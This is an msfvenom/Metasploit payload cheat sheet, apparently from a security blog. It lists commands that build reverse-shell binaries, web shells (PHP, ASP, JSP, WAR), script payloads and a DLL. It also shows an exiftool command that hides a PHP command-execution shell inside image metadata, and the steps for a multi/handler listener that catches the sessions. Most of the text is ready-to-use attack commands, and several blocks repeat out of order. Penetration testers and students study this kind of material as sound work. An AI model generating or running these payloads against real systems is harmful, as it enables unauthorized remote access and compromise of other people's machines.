Multiple payloads can be created with modules and it helps something that can give you a shell in almost any situation.
For each of these payloads we need go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options: LHOST, LPORT,....
Start database:
$ msfdb init
$ service postgresql start
List Available Payloads:
$ msfvenom -l
Binaries Payloads:
1. Linux
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f elf > shell.elf
2. Windows
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f exe > shell.exe
3. Mac
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f macho > shell.macho
Web Payloads:
1. PHP
$ msfvenom -p php/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -e php/base64 R > shell.php
2. ASP
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f asp > shell.asp
3. JSP
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw > shell.jsp
$ msfvenom -p php/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -e php/base64 R > shell.php
2. ASP
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f asp > shell.asp
3. JSP
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw > shell.jsp
4. War
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f war > shell.war
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f war > shell.war
Scripting Payloads
1. Python
$ msfvenom -p cmd/unix/reverse_python LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw > shell.py
2. Bash
$ msfvenom -p cmd/unix/reverse_bash LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw > shell.sh
3.Perl
$ msfvenom -p cmd/unix/reverse_perl LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw > shell.pl
4. Image
$ exiftool -DocumentName="<h1>Laladee<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" image.jpeg
5. Dll
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f dll > privesc.dll
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f dll > privesc.dll
Create Handlers
$ msfconsole
$ msf > use exploit/multi/handler
$ msf exploit(multi/handler) > set LHOST <host>
$ msf exploit(multi/handler) > set LPORT <port>
$ msf exploit(multi/handler) > set PAYLOAD <payload>
$ msf exploit(multi/handler) > set ExitOnSession false
$ msf exploit(multi/handler) > exploit -j -z
Load Custom Payloads
Metasploit allow you to generate Payload and use it during an attack. To use this function, simply generate your Payload before to run your attack and once you are done, use “payload/generic/custom” to specify the Payload to use.
$ msfconsole
$ msf > use payload/generic/custom
$ msf payload(custom) > show options
$ msf payload(custom) > set PAYLOADFILE /path/to/the/payload
$ msf payload(custom) > set PAYLOADSTR the_payload_string_to_use
$ msf > use payload/generic/custom
$ msf payload(custom) > show options
$ msf payload(custom) > set PAYLOADFILE /path/to/the/payload
$ msf payload(custom) > set PAYLOADSTR the_payload_string_to_use
Read more: neoslab.com
